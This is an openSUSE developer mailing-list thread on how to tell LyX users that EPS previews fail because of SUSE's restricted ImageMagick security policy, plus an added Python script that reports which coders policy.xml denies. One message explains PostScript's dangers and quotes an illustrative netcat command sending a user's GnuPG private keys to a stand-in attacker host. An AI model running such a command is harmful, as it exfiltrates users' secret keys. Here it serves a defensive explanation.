[opensuse-factory] How to inform users of security settings (boo#713289)
Hi,

I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working? I found out, because I know a little of the inner workings of LyX, with the help of Google and by looking through related packages in Yast. Can we not find a better way to inform users?

An idea to shoot on: when there were issues with plasma and the nouveau 3D driver, the user installing those drivers was informed that he took a risk. Can we use a similar way when a user for example installs ImageMagick: "for security reasons some settings are disabled in openSUSE, if you know what you are doing, you can do this and that to enable those options"?

As a user I would appreciate to be informed, especially about something like this, that I know nothing about. Do you think this is a good idea? Or has someone a better one?

Thanks,
Cor

--
To unsubscribe, e-mail: opensuse-factory+unsubscribe@opensuse.org
To contact the owner, e-mail: opensuse-factory+owner@opensuse.org
On Thursday 2019-07-04 13:06, Cor Blom wrote:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
On Thursday 2019-07-04 13:06, Cor Blom wrote:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
This is a submitrequest ID for Factory actually ...

+- Update the description in the spec file with information on
+  security setting for ImageMagick in openSUSE. See boo#1139928
+  It seems the only thing we can do about it.

There is the bug, it is open.

Ciao, Marcus
On 04-07-19 at 13:45, Marcus Meissner wrote:
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
This is a submitrequest ID for Factory actually ...
+- Update the description in the spec file with information on
+  security setting for ImageMagick in openSUSE. See boo#1139928
+  It seems the only thing we can do about it.
There is the bug, it is open.
Ciao, Marcus
Yes, sorry, 713289 was the SR number. The bugreport number is #1139928. My mistake.

Cor
On 04-07-19 at 13:57, Cor Blom wrote:
Yes, sorry, 713289 was the SR number. The bugreport number is #1139928. My mistake.
And the relevant changelog in ImageMagick is:

Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com

- provide two new (conflicting) packages with configuration [bsc#1122033]:
  * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions)
  * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions)
  and use update-alternatives for selecting configurations.
- remove code for < 1315
- deleted patches
  - ImageMagick-disable-insecure-coders.patch (renamed)
- added patches
  + ImageMagick-configuration-SUSE.patch
On 04/07/2019 14.24, Cor Blom wrote:
And the relevant changelog in ImageMagick is:
Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com
- provide two new (conflicting) packages with configuration [bsc#1122033]:
  * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions)
  * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions)
  and use update-alternatives for selecting configurations.
- remove code for < 1315
- deleted patches
  - ImageMagick-disable-insecure-coders.patch (renamed)
- added patches
  + ImageMagick-configuration-SUSE.patch
Sorry, users will not read this. Not even know they have to read this, unless you tell them "somewhere" that this time they have to read it.

Rather, you could consider to add a README.SUSE file to the LyX documentation directory where it explains why some features do not work.

--
Cheers / Saludos,
Carlos E. R. (from 15.0 x86_64 at Telcontar)
On 04-07-19 at 14:34, Carlos E. R. wrote:
Sorry, users will not read this. Not even know they have to read this, unless you tell them "somewhere" that this time they have to read it.
Rather, you could consider to add a README.SUSE file to the LyX documentation directory where it explains why some features do not work.
Well, there are many different users. I read package descriptions in Yast, I don't read README's, unless I am pointed in that direction in the description.

So if there is no other solution, I probably should do both.

Cor
On 04/07/2019 14.51, Cor Blom wrote:
On 04-07-19 at 14:34, Carlos E. R. wrote:
Sorry, users will not read this. Not even know they have to read this, unless you tell them "somewhere" that this time they have to read it.
Rather, you could consider to add a README.SUSE file to the LyX documentation directory where it explains why some features do not work.
Well, there are many different users. I read package descriptions in Yast, I don't read README's, unless I am pointed in that direction in the description.
Package description, certainly, most of us read it, in YaST (dunno about zypper). But the Changelog, no, which is what was posted above.
So if there is no other solution, I probably should do both.
Maybe an indication in the description with longer explanation in README.SUSE. This file typically described what was different in the openSUSE package compared to upstream.

--
Cheers / Saludos,
Carlos E. R. (from 15.0 x86_64 at Telcontar)
On 04/07/2019 22:04, Carlos E. R. wrote:
Sorry, users will not read this. Not even know they have to read this, unless you tell them "somewhere" that this time they have to read it.
Rather, you could consider to add a README.SUSE file to the LyX documentation directory where it explains why some features do not work.
Users probably won't read that, but they will google, and hopefully that will lead them to this thread or a forum post.

--
Simon Lees (Simotek) http://simotek.net
Emergency Update Team keybase.io/simotek
SUSE Linux Adelaide Australia, UTC+10:30
GPG Fingerprint: 5B87 DB9D 88DC F606 E489 CEC5 0922 C246 02F0 014B
On 05/07/2019 03.25, Simon Lees wrote:
On 04/07/2019 22:04, Carlos E. R. wrote:
Sorry, users will not read this. Not even know they have to read this, unless you tell them "somewhere" that this time they have to read it.
Rather, you could consider to add a README.SUSE file to the LyX documentation directory where it explains why some features do not work.
Users probably won't read that, but they will google, and hopefully that will lead them to this thread or a forum post.
The description shown by YaST has great visibility, and it points to the readme. Is this description the same as shown by Search of a page on our web pages? If it is, they will see the readme mentioned there, too.

--
Cheers / Saludos,
Carlos E. R. (from 15.0 x86_64 at Telcontar)
On 04.07.19 at 14:24, Cor Blom wrote:
Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com
- provide two new (conflicting) packages with configuration [bsc#1122033]:
  * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions)
  * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions)
  and use update-alternatives for selecting configurations.
- remove code for < 1315
- deleted patches
  - ImageMagick-disable-insecure-coders.patch (renamed)
- added patches
  + ImageMagick-configuration-SUSE.patch
on tumbleweed 20190607
there is in update-alternatives only one entry:
choice: priority: /etc/ImageMagick-7-suse 10
nothing to select between ???
how to switch to the upstream settings?

simoN
--
www.becherer.de
Simon Becherer wrote on Thu 04. 07. 2019 at 15:12 +0200:
on tumbleweed 20190607
there is in update-alternatives only one entry:
choice: priority: /etc/ImageMagick-7-suse 10
nothing to select between ???
how to switch to the upstream settings?
Please either file bugs or go to support channel. This mailing list is supposed to be used for development.

Also the upstream configuration is most probably in package 'ImageMagick-config-7-upstream' so just install that and switch to it.

Tom
Hello,

On Jul 4 14:24 Cor Blom wrote (excerpt):
Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com
- provide two new (conflicting) packages with configuration [bsc#1122033]:
  * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions)
  * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions)
  and use update-alternatives for selecting configurations.
- remove code for < 1315
- deleted patches
  - ImageMagick-disable-insecure-coders.patch (renamed)
- added patches
  + ImageMagick-configuration-SUSE.patch
FYI:
For some background information about the root cause behind all those PostScript/Ghostscript related security issues see the section "It is crucial to limit access to CUPS to trusted users" in https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings that reads (excerpts):

-------------------------------------------------------------------
PostScript but also PDF to some extent ... is actually a program.
...
PostScript is a general purpose Turing-complete programming language (cf. https://en.wikipedia.org/wiki/PostScript) that supports in particular file access on the system disk. When Ghostscript processes PostScript it runs a PostScript program as the user who runs Ghostscript ...
When Ghostscript processes an arbitrary PostScript file, the user who runs Ghostscript runs an arbitrary program which can do anything on the system where Ghostscript runs that this user is allowed to do on that system.
To make it safer when Ghostscript runs a PostScript program the Ghostscript command line option '-dSAFER' disables certain file access functionality (for details see /usr/share/doc/ghostscript/*/Use.htm).
...
Its name 'SAFER' says everything: It makes it 'safer' to let Ghostscript run a PostScript program, but it does not make it completely safe.
-------------------------------------------------------------------

Simply put:
Via some special (but well known) indirections in Ghostscript a PostScript program or an Encapsulated PostScript [EPS] program that a user runs via Ghostscript could execute certain stuff which results basically the equivalent of things like

netcat server.attacker.net 12345 </home/user/.gnupg/private-keys

when an innocent user only liked to view the graphical output of a malicious PostScript program or convert it into another (graphical) data type.

Cf. http://bugzilla.opensuse.org/show_bug.cgi?id=1134327#c13

In the end it means:
By default it must not be allowed to let Ghostscript (or any other PostScript interpreter) run arbitrary PostScript programs from (possibly) untrusted origin.

Kind Regards
Johannes Meixner
--
SUSE LINUX GmbH - HRB 21284 (AG Nuernberg)
GF: Felix Imendoerffer, Mary Higgins, Sri Rasiah
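The thread's recurring problem is that a user cannot tell from LyX that ImageMagick's restricted configuration is what blocks the EPS preview. A small diagnostic that reads ImageMagick's policy.xml and names the entry denying a coder answers that question from the machine itself. This is an added example, not code from this thread, from LyX or from the ImageMagick packages; it uses a constructed sample policy (not the real ImageMagick-config-SUSE file), applies ImageMagick's rule that a right is authorized only if every matching coder policy grants it, and simplifies pattern matching to brace alternation plus case-insensitive globbing (an assumption).

```python
"""Diagnose whether an ImageMagick coder (EPS, PS, PDF, ...) is blocked by policy.xml."""
import fnmatch
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample resembling a restricted policy.xml; NOT the file shipped by
# ImageMagick-config-SUSE, whose exact contents this example does not claim to know.
SAMPLE_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}" />
  <policy domain="coder" rights="read" pattern="HTTPS" />
  <policy domain="resource" name="memory" value="256MiB" />
</policymap>"""

RIGHT_NAMES = ("read", "write", "execute")


def _expand_braces(pattern):
    """Expand {a,b,c} alternation (nested allowed) into plain glob patterns."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if not m:
        return [pattern]
    expanded = []
    for alt in m.group(1).split(","):
        expanded.extend(_expand_braces(pattern[:m.start()] + alt.strip() + pattern[m.end():]))
    return expanded


def _matches(pattern, coder):
    # Assumption: case-insensitive glob match, a simplification of ImageMagick's GlobExpression.
    return any(fnmatch.fnmatchcase(coder.upper(), p.upper()) for p in _expand_braces(pattern))


def _parse_rights(text):
    """'none' (or a missing attribute) grants nothing; otherwise collect e.g. 'read|write'."""
    text = (text or "").strip().lower()
    if text == "none":
        return frozenset()
    return frozenset(r for r in RIGHT_NAMES if r in text)


def matching_policies(policy_xml, coder):
    """Return (pattern, granted_rights) for every coder-domain policy matching `coder`."""
    root = ET.fromstring(policy_xml)
    return [(p.get("pattern"), _parse_rights(p.get("rights")))
            for p in root.iter("policy")
            if p.get("domain") == "coder" and _matches(p.get("pattern", ""), coder)]


def coder_allowed(policy_xml, coder, right="read"):
    """ImageMagick semantics: a right is authorized only if every matching policy grants it."""
    return all(right in rights for _, rights in matching_policies(policy_xml, coder))


def explain(policy_xml, coder, right="read"):
    """One-line diagnostic naming the policy pattern(s) that deny the requested right."""
    blocking = [pat for pat, rights in matching_policies(policy_xml, coder) if right not in rights]
    if not blocking:
        return f"{coder}: {right} permitted"
    return f"{coder}: {right} denied by policy pattern(s) {', '.join(blocking)}"


if __name__ == "__main__":
    # Optional: pass the path of the active policy.xml (e.g. under /etc/ImageMagick-*)
    # to check the real configuration instead of the constructed sample.
    policy = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_POLICY
    for name in ("EPS", "PS", "PDF", "PNG"):
        print(explain(policy, name))
```

Run against the sample it reports EPS, PS and PDF as denied by the brace pattern and PNG as permitted; pointed at the policy.xml selected by update-alternatives it shows whether the SUSE or the upstream configuration is in effect for those coders.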
On 04-07-19 at 16:07, Johannes Meixner wrote:
Thanks for the information. Thanks all for input.

My proposal was not met with enthusiasm, so that is a no-go. I have added a README.SUSE with all information and options the user has. In the description field I refer to this. It is in Publishing/lyx, for those who would like to give feedback. I will submit it later to factory.

Kind Regards,
Cor
On Thu, 4 Jul 2019 at 08:07, Cor Blom <cornelisbb@gmail.com> wrote:
Hi,
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working? I found out, because I know a little of the inner workings of LyX, with the help of Google and by looking through related packages in Yast. Can we not find a better way to inform users?
Hi,

What about adding a note to the release notes?

Regards,
Luiz
On 04/07/2019 14.45, Luiz Fernando Ranghetti wrote:
Hi,
What about adding a note to the release notes?
Certainly, but must be kept there for years to come.

--
Cheers / Saludos,
Carlos E. R. (from 15.0 x86_64 at Telcontar)
participants (9)
- Carlos E. R.
- Cor Blom
- Jan Engelhardt
- Johannes Meixner
- Luiz Fernando Ranghetti
- Marcus Meissner
- Simon Becherer
- Simon Lees
- Tomas Chvatal